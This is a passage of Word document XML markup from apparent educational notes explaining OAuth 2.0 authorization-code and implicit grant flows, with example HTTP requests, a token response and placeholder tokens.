          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>redirect_uri</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>=https://client-app.com/callback&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>grant_type</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>=authorization_code&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>code</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>=a1b2c3d4e5f6g7h8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBB7A25" w14:textId="6A43B68F" w:rsidR="00D06A6F" w:rsidRPr="008026BD" w:rsidRDefault="00EB1C66" w:rsidP="00B9084F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Courier" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>client_secret</w:t>
      </w:r>
      <w:r w:rsidR="00020AC2" w:rsidRPr="008026BD">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Courier" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: established when the application client registered with the OAuth service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A942D27" w14:textId="1F6887F9" w:rsidR="00FB2880" w:rsidRPr="008026BD" w:rsidRDefault="00FB2880"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5. Access token grant</w:t>
      </w:r>
      <w:r w:rsidR="00020AC2" w:rsidRPr="008026BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (in back-channel)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05886933" w14:textId="77777777" w:rsidR="00020AC2" w:rsidRPr="008026BD" w:rsidRDefault="00020AC2" w:rsidP="00B9084F">
      <w:p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color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D388E29" w14:textId="77777777" w:rsidR="00020AC2" w:rsidRPr="008026BD" w:rsidRDefault="00020AC2" w:rsidP="00B9084F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">    "access_token": "z0y9x8w7v6u5",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB2B1CA" w14:textId="77777777" w:rsidR="00020AC2" w:rsidRPr="008026BD" w:rsidRDefault="00020AC2" w:rsidP="00B9084F">
      <w:p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color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">    "token_type": "Bearer",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5B85D9" w14:textId="77777777" w:rsidR="00020AC2" w:rsidRPr="008026BD" w:rsidRDefault="00020AC2" w:rsidP="00B9084F">
      <w:p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color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">    "expires_in": 3600,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712AAC26" w14:textId="77777777" w:rsidR="00020AC2" w:rsidRPr="008026BD" w:rsidRDefault="00020AC2" w:rsidP="00B9084F">
      <w:p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color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">    "scope": "openid profile",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1B113D" w14:textId="77777777" w:rsidR="00020AC2" w:rsidRPr="008026BD" w:rsidRDefault="00020AC2" w:rsidP="00B9084F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">    …</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B990428" w14:textId="62710622" w:rsidR="00D06A6F" w:rsidRPr="008026BD" w:rsidRDefault="00020AC2" w:rsidP="00B9084F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB5F23D" w14:textId="79FD30CA" w:rsidR="00FB2880" w:rsidRPr="008026BD" w:rsidRDefault="00FB2880"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6. API call</w:t>
      </w:r>
      <w:r w:rsidR="00020AC2" w:rsidRPr="008026BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (in back-channel)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511ADBC9" w14:textId="15CA8511" w:rsidR="00FB2880" w:rsidRPr="008026BD" w:rsidRDefault="00C705B2" w:rsidP="00B9084F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00FB2880" w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>he client application</w:t>
      </w:r>
      <w:r w:rsidR="00020AC2" w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FB2880" w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fetch</w:t>
      </w:r>
      <w:r w:rsidR="00020AC2" w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>es</w:t>
      </w:r>
      <w:r w:rsidR="00FB2880" w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the user's data from the resource server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB8DAE8" w14:textId="77777777" w:rsidR="00020AC2" w:rsidRPr="008026BD" w:rsidRDefault="00020AC2" w:rsidP="00B9084F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="266CF651" w14:textId="77777777" w:rsidR="00020AC2" w:rsidRPr="008026BD" w:rsidRDefault="00020AC2" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>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GET /userinfo HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D325486" w14:textId="77777777" w:rsidR="00020AC2" w:rsidRPr="008026BD" w:rsidRDefault="00020AC2" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>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Host: oauth-resource-server.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B5B317" w14:textId="62F489E7" w:rsidR="0044057A" w:rsidRPr="008026BD" w:rsidRDefault="00020AC2" w:rsidP="00B9084F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Authorization: Bearer z0y9x8w7v6u5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0465F5" w14:textId="0266E714" w:rsidR="00E81047" w:rsidRPr="008026BD" w:rsidRDefault="00E81047"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7. Resource grant (in back-channel)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5B5A21" w14:textId="77777777" w:rsidR="00020AC2" w:rsidRPr="008026BD" w:rsidRDefault="00020AC2" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="596AC27C" w14:textId="77777777" w:rsidR="00020AC2" w:rsidRPr="008026BD" w:rsidRDefault="00020AC2" w:rsidP="00B9084F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Implicit grant type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15220530" w14:textId="6125A297" w:rsidR="004B07DC" w:rsidRPr="008026BD" w:rsidRDefault="00C705B2" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Client application receives the access token immediately (</w:t>
      </w:r>
      <w:r w:rsidR="004B07DC" w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>no authorization code)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7678AF89" w14:textId="2145ED98" w:rsidR="004B07DC" w:rsidRPr="008026BD" w:rsidRDefault="004B07DC" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C26D14D" wp14:editId="62C917AA">
            <wp:extent cx="6641450" cy="28203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8541" cy="2857375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D73C07" w14:textId="77777777" w:rsidR="004B07DC" w:rsidRPr="008026BD" w:rsidRDefault="004B07DC"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lastRenderedPageBreak/>
        <w:t>1. Authorization request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54065FC7" w14:textId="77777777" w:rsidR="00E81047" w:rsidRPr="008026BD" w:rsidRDefault="00E81047" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>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GET /authorization?client_id=12345&amp;redirect_uri=https://client-app.com/callback&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>response_type=token</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&amp;scope=openid%20profile&amp;state=ae13d489bd00e3c24 HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270ECF52" w14:textId="13953654" w:rsidR="00061A4E" w:rsidRPr="008026BD" w:rsidRDefault="00E81047" w:rsidP="00B9084F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Host: oauth-authorization-server.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387D0B7D" w14:textId="77777777" w:rsidR="00E81047" w:rsidRPr="008026BD" w:rsidRDefault="00E81047"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2. User login and consent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A3E2C0" w14:textId="77777777" w:rsidR="00E81047" w:rsidRPr="008026BD" w:rsidRDefault="00E81047"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3. Access token grant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6813128C" w14:textId="5B172DCF" w:rsidR="00E81047" w:rsidRPr="008026BD" w:rsidRDefault="00E81047" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>GET /callback#</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>access_token=z0y9x8w7v6u5</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>token_type</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>=Bearer&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>expires_in</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>=5000&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>scope</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>=openid%20profile&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>state</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>=ae13d489bd00e3c24 HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EC86B6" w14:textId="77777777" w:rsidR="00E81047" w:rsidRPr="008026BD" w:rsidRDefault="00E81047" w:rsidP="00B9084F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>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Host: client-app.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D31FF0" w14:textId="57F864B1" w:rsidR="004B07DC" w:rsidRPr="008026BD" w:rsidRDefault="00061A4E" w:rsidP="00B9084F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="004B07DC" w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>he client application must use a suitable script to extract the fragment</w:t>
      </w:r>
      <w:r w:rsidR="00E81047" w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
